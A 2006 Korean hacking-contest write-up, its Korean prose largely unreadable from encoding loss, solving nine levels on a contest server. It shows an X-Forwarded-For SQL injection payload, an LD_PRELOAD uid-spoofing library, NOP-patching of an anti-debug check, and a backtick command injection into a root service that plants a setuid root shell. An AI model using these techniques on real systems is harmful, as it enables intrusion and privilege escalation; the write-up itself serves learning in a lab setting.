Ͱѯxհѯxհѯxհѯxհѯx
f                                      f
  UDCSC 2006 Hacking Festival Report  
f                                      f
Ͱѯxѯxѯxѯxѯxѯxџy

[hkpco@ns hkpco]$ whoami
name : Park Chan Am

id : hkpco

mail&msn : hkpco@korea.com

homepage : http://hkpco.kr/

face_quality : High

 : б


======================================================================================================

Ϻ б ̶  (?) ظ Ź帳ϴ.

̹ html̳ pdf ۼϰ ;..;

賡   ؾ߰ڽϴ. ^^;

======================================================================================================



Round 1.
----------------------------------------------------------------------

LEVEL1  
UDCSC ȸ Ȩ ߴٰ?!  
UDCSC ȸ Ȩ ̵ϱ

----------------------------------------------------------------------

ȸ Ȩ ŷߴٰ մϴ.

`ȸȨ ̵ϱ` ŬϿ ũ   Ŭ ų(?)   ѱ ϴ.
( ũ ϳ ɸ ʾұ  )

ҽ⸦ غ( ٷ ãҽϴ.) Ʒ  κ Դϴ.

<iframe src=./count.php width=0 height=0></iframe>

iframe ܳ..    ϴ.

http://168.188.130.240/e987463bf0418539b306409f86997a21/count.php   ,

մϴ! level1 н 'lets go together!' Դϴ.

   н带 ȹϿϴ. ^^;





Round 2.
----------------------------------------------------------------------
LEVEL2   
 
׸ڸ ƶ!

( ׸......... ) 
 
ѹα ౸ ȭ! 
----------------------------------------------------------------------

level2   ,   ڵ尡 ִ  ҽ Ǹ ׸ ϴ.

ҽ⸦ ϸ Ʒ    ׸ ̸   Դϴ.

<td width=200 height=200 background=whatisthis.jpg><img src=reddevil.jpg width=200 height=200></td>

  ΰ ġ±.

ó  whatisthis.jpg  غ  Cҽ   ־ϴ.

 鼭   ϴ α׷̾µ,   15    ֽϴ.





Round 3.
----------------------------------------------------------------------
LEVEL3   
 
ũĿ ɸ Ż Ʈ ¥ ƿƼ ÷.
ũĿ ɸ ID ˾Ƴ Ű!  
ͳ ǵ  ƿƼ ٿε 
----------------------------------------------------------------------

Ŷ ĸ  ٸ ˸  Ǯ  ִ Դϴ.
irc ϴ α׷̱ ^^;

:padoirc.padocon.org 001 KOR|762083 :Welcome to the PADOCON IRC Network KOR|762083!otghnkz@59.15.35.196
:padoirc.padocon.org 002 KOR|762083 :Your host is padoirc.padocon.org, running version Unreal3.2.3
:padoirc.padocon.org 003 KOR|762083 :This server was created Wed Apr 27 2005 at 18:00:59 KST
:padoirc.padocon.org 004 KOR|762083 padoirc.padocon.org Unreal3.2.3 iowghraAsORTVSxNCWqBzvdHtGp
                                    lvhopsmntikrRcaqOALQbSeIKVfMCuzNTGj
:padoirc.padocon.org 005 KOR|762083 SAFELIST HCN MAXCHANNELS=10 CHANLIMIT=#:10 MAXLIST=b:60,e:60,I:60
                                    NICKLEN=30 CHANNELLEN=32 TOPICLEN=307 KICKLEN=307 AWAYLEN=307 MAXTARGETS=20
                                    WALLCHOPS WATCH=128 :are supported by this server
:padoirc.padocon.org 005 KOR|762083 SILENCE=15 MODES=12 CHANTYPES=# PREFIX=(ohv)@%+ CHANMODES=beIqa,kfL,lj,
                                    psmntirRcOAQKVGCuzNSMTG NETWORK=PADOCON CASEMAPPING=ascii EXTBAN=~,cqnr ELIST=MNUCT
                                    STATUSMSG=@%+ EXCEPTS INVEX CMDS=KNOCK,MAP,DCCALLOW,USERIP :are supported by this server
:padoirc.padocon.org 251 KOR|762083 :There are 6 users and 5 invisible on 1 servers
:padoirc.padocon.org 254 KOR|762083 4 :channels formed

.
.
.

:KOR|762083!otghnkz@59.15.35.196 JOIN :#test
:padoirc.padocon.org 353 KOR|762083 #test:KOR|762083 KOR|778454 [8]KOR|762021 KOR|114838 crackers1m0dun KOR|441656 KOR|831437
:padoirc.padocon.org 366 KOR|762083 #test :End of /NAMES list.
:padoirc.padocon.org 302 KOR|762083 :KOR|762083=+otghnkz@59.15.35.196    
:padoirc.padocon.org 302 KOR|762083 :KOR|762083=+otghnkz@59.15.35.196    


н crackers1m0dun





Round 4.
----------------------------------------------------------------------
  
 
 Ư IP ϴ  Proxy Server ϴ
Ʈ ִ.  Ʈ  ϶.
 
ID  
PWD  
----------------------------------------------------------------------

̹   ξ   Ǯϴ.

  ͿĿ   ,  X-Forwarded-For޼ҵ sql injection  ߴ ־µ

( ǵ ٰ ƴϾ  ^^;)̹ ȸ ̷  ٴ...

Proxy Server ϴ Ʈ ִٰ Ͽϴ.

magic_quote onǾִٴ  ֳ׿.

 magic_quote onǾ־ Apache Environment  ɼ  ʽϴ.

level4 Apache Environment   Ͽ sql injection  ΰ ϴ.

Achilles ̿Ͽ 1и ~.

Proxy Server X-Forwarded-For ̶ Method  ɴϴ.

׷  ޼ҵ忡 sql injection   û ڽϴ.


GET /c853248badee15215da287ffa39d7965/level4.php?id=test&pwd=test HTTP/1.0
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*
Referer: http://168.188.130.240/c853248badee15215da287ffa39d7965/
Accept-Language: ko
Proxy-Connection: Keep-Alive
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
Host: 168.188.130.240
X-Forwarded-For: 'or 0=' <- ߰ κ

û----------------------------------------

մϴ! н 'caffelatt3' Դϴ.





Round 5.
----------------------------------------------------------------------
level5 ~ level 9
Login 168.188.130.240:SSH 
id : udcsc 
password : level4's password 

-bash-3.00$ cat level5_hint
:: UDCSC  ŷ 佺Ƽ 2006 LEVEL5  ::

. LEVEL5  
/home/udcsc/level5/level5  Ѵ.
  ̿ؼ level5 н带 ȹض.
----------------------------------------------------------------------

~,    Գ׿ @_@

̹   ־ϴ  Ǯ  ־ϴ.  ......

   ٸ ̷̷ .. ϸ鼭   Բ  ư Ƽ ߴ ־µ,,

  ̷   ...

ٸ  ־, ȸ  ǵ!, ^^;

 ο   ˷ִ,  Ѵ Ͽ   ۼؼ packetstorm  ߾µ..

 ۼ ϰ  ~, Ʒ   ũԴϴ.

http://packetstormsecurity.org/papers/attack/shl_hijacking.txt

׷  shared library hooking̶ ִ  Ͽ   Ǯڽϴ.

-bash-3.00$ /home/udcsc/level5/level5
Sorry, Your id is not level5

level5 ƴ϶ ϴ±, uid,gidüũ Ͽ ڽϴ.(  uid ϸ gid  üũ ̷ϴ. )

-bash-3.00$ cat /etc/passwd|grep "level5"
level5:x:7979:7979::/dev/null:/sbin/nologin
-bash-3.00$ cat hk.c
#include <dlfcn.h>
#include <unistd.h>
#include <sys/types.h>

uid_t geteuid( void )
{
	return 7979;
}

uid_t getuid( void )
{
	return 7979;
}
uid_t getegid(void)
{
	return 7979;
}
uid_t getgid(void)
{
	return 7979;
}
-bash-3.00$ gcc hk.c -fPIC -shared -o hk.so
-bash-3.00$ export LD_PRELOADED="/tmp/hk.so"
-bash-3.00$ /home/udcsc/level5/level5
մϴ. level5 н 'i_like_raison' Դϴ.


nice!,





Round 6.
----------------------------------------------------------------------
:: UDCSC  ŷ 佺Ƽ 2006 LEVEL6  ::

. LEVEL6  
http://168.188.130.240/level6/Labyrinth.exe ٿ޾ƶ.
----------------------------------------------------------------------

 α׷  ?_?ϴ ƾ ϰ ֽϴ.
 ׺ ã nop äָ ˴ϴ.
.. α  س.. ˼մϴ.( 賡  ؾ߰ڳ׿  )

004016BE     68 C4F25B00    PUSH Labyrint.005BF2C4      ;  ASCII "Debugger is detected! process terminated!"



004016BE     90             NOP
004016BE     90             NOP
004016BE     90             NOP
004016BE     90             NOP

׸ н带  ִ κ(Congratulation ~~~~~~) ãƼ jmpָ ..^^





Round 7.
----------------------------------------------------------------------
-bash-3.00$ cat level7_hint
:: UDCSC  ŷ 佺Ƽ 2006 LEVEL7  ::

. LEVEL7  
/home/udcsc/level7/level7  Ѵ.
̸ мؼ level7 н带 ȹض.
----------------------------------------------------------------------

level8 κ  1оȿ ǬͰ׿..
̹   ʿ  ..!,

-bash-3.00$ ls -l /home/udcsc/level7/level7
-r--r--r--  1 root root 4876  6 23 18:12 /home/udcsc/level7/level7
-bash-3.00$ cp /home/udcsc/level7/level7 /tmp/haha
-bash-3.00$ /tmp/haha
-bash: /tmp/haha: 㰡 źε
-bash-3.00$ chmod 755 /tmp/haha
-bash-3.00$ /tmp/haha
մϴ. level7 н '112' Դϴ.






Round 8.
----------------------------------------------------------------------
:: UDCSC  ŷ 佺Ƽ 2006 LEVEL8  ::

. LEVEL8  
   ħ ־. ׸ ƶ!
----------------------------------------------------------------------

 ħ ־ٰ մϴ. ..?  ƴѵ...^^;

setuid۹̼ ϵ ãƺ Ư ǽɰ° ϴ.

  ҳ Ͽ /home丮  ҽϴ.

-bash-3.00$ cd /home
-bash-3.00$ ls -al
հ 88
drwxr-xr-x   7 root     root       4096  6 25 05:43 .
drwxr-xr-x  23 root     root       4096  6 25 06:31 ..
-rw-r--r--   1     7981       7981   24  6 23 13:00 .bash_logout
-rw-r--r--   1     7981       7981  191  6 23 13:00 .bash_profile
-rw-r--r--   1     7981       7981  124  6 23 13:00 .bashrc
-rw-r--r--   1     7981       7981  383  6 23 13:00 .emacs
drwx------   2 mysql    mysql      4096  6 22 09:40 mysql
drwx------   2     7978       7978 4096  6 23 23:35 shadow
drwx------   8 udcsc    udcsc      4096  6 25 07:48 udcsc
drwxr-xr-x   3 x15kangx x15kangx   4096  6 22 17:57 x15kangx
-bash-3.00$ cat /etc/passwd|grep "shadow"
-bash-3.00$


ߴ ǽɰ κ ֽϴ.
ٷ shadow!,

7981̶ user  ãƺڽϴ.
-bash-3.00$ find / -user     7981 2>/dev/null
/mnt/.floppy/shadow
/home/.bash_logout
/home/.bashrc
/home/.emacs
/home/.bash_profile
-bash-3.00$ cat /mnt/.floppy/shadow
mysql pwd : shad0w!?

mysql pwdȹ ^^~
mysql °  ʹ غ ̰͵ İ ..

-bash-3.00$ mysql -u shadow -p
Enter password:
Welcome to the MySQL monitor.  Commands end with ; or \g.
Your MySQL connection id is 3287 to server version: 3.23.58

Type 'help;' or '\h' for help. Type '\c' to clear the buffer.

mysql> show databases;
+----------+
| Database |
+----------+
| level4   |
| mysql    |
| sebek    |
| shadow   |
+----------+
4 rows in set (0.00 sec)

mysql> use shadow
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Database changed
mysql> show tables;
+------------------+
| Tables_in_shadow |
+------------------+
| shadow           |
+------------------+
1 row in set (0.00 sec)

mysql> select * from shadow;
+--------+--------------------+
| id     | pwd                |
+--------+--------------------+
| level8 | starcraft_forever! |
+--------+--------------------+
1 row in set (0.00 sec)

mysql>





Round 9. Fight!
----------------------------------------------------------------------
:: UDCSC  ŷ 佺Ƽ 2006 LEVEL9  ::

. LEVEL9  
 Ŷ ſ  ; Ѵ.
׸ ϵ  ִ ׸   .
----------------------------------------------------------------------

 ſ ǹ̽մϴ. ׿..
ÿ 9000~9009 Ʈ  ֽϴ.
 Ʈ ׻ ִ° ƴϰ ÷   ٲ..
Ʒ ps -aux  Ư Ʈ bindų Դϴ.

root     25870  0.0  0.1  2644  320 ?        Ss   02:17   0:00 /usr/bin/level9 9005
root     25872  0.0  0.1  2856  276 ?        Ss   02:17   0:00 /usr/bin/level9 9006
root     25874  0.0  0.1  2164  324 ?        Ss   02:17   0:00 /usr/bin/level9 9007
root     25876  0.0  0.1  1516  324 ?        Ss   02:17   0:00 /usr/bin/level9 9008
root     25878  0.0  0.1  3276  320 ?        Ss   02:17   0:00 /usr/bin/level9 9009
root     26615  0.0  0.1  2280  272 ?        Ss   02:32   0:00 /usr/bin/level9 9002
root     26619  0.0  0.1  2700  324 ?        Ss   02:32   0:00 /usr/bin/level9 9004

.. ݸ ...

-bash-3.00$ ls -al /usr/bin|grep "level9"
-rwx------   1 root root       7105  6 24 23:54 level9
-rwx------   1 root root       6612  6 23 19:39 level9_send
-rwx------   1 root root        221  6 25 00:06 level9_start.sh
-bash-3.00$ (perl -e 'print "A"x256')|nc localhost 9009
input your IP:
-bash-3.00$ (perl -e 'print "A"x255')|nc localhost 9009
input your IP:
got it?-bash-3.00$

ó 256Ʈ ̸̻ α׷ got it?  ϰ Ǿ remote fedora_bof ˾ҽϴ.

 ߿ ǵ ٸε  б ȭ  Ŷ ߰ ־ϴ.

׷   ϳ ǵ    ߰ߵǾϴ.

α׷ level9_send ip   Ǿµ,  κп  .. ſ ..   ...

 մϴ. Ƹ sprintfͰ  %s ̿Ͽ ip ڰ ְ ״ 

⼭ ; , | , & ׸ ` `  ȸϿ ٸ     ֽϴ.

̰ Ͽ Ʈ ȹ  ڽϴ.

-bash-3.00$ cat /tmp/aa.c
#include <stdio.h>
#include <unistd.h>

int main( void )
{
        setreuid(0,0);
        setregid(0,0);
        system("/bin/sh");
}
-bash-3.00$ cat /tmp/c.c
#include <stdio.h>
#include <unistd.h>

int main( void )
{
        system( "cp /tmp/aa /tmp/kk" );
        system( "chmod 6755 /tmp/kk" );
}
-bash-3.00$ chmod 6755 aa
-bash-3.00$ chmod 6755 c
-bash-3.00$ telnet localhost 9009
Trying 127.0.0.1...
Connected to localhost.localdomain (127.0.0.1).
Escape character is '^]'.
input your IP:`/tmp/c`

got it?Connection closed by foreign host.

-bash-3.00$ /tmp/c
sh-3.00#

Ʈ ȹ!, Ƹ level9_sendα׷  ´ٸ н带   Դϴ.

strings ѹ Ȯ  ڽϴ.

sh-3.00# strings /usr/bin/level9_send
/lib/ld-linux.so.2
_Jv_RegisterClasses
__gmon_start__
libc.so.6
printf
socket
inet_addr
setsockopt
strncpy
htonl
sendto
memset
htons
_IO_stdin_used
__libc_start_main
strlen
GLIBC_2.0
PTRhx
a tiny encrypted packet! <--------------------------!!!
### usage : %s your_ip ###
your input %s is too long!
168.188.130.240


 н a tiny encrypted packet! ^^;


-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

ı:::

 б ⸻̶    ʷ  ׿.   ֽñ..̤

߿  ڽϴ.

level8 ѽð ȵǼ  ǬͰ׿ 0_0  ׷츦 ϱ⸸ ߴµ  ̷ ֱ..

ȸ غѴٰ Ͻ  е  մϴ.

.. ׷  ̸  ġ Ϸ ߰ڳ׿...

ε ȳ ^^;

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

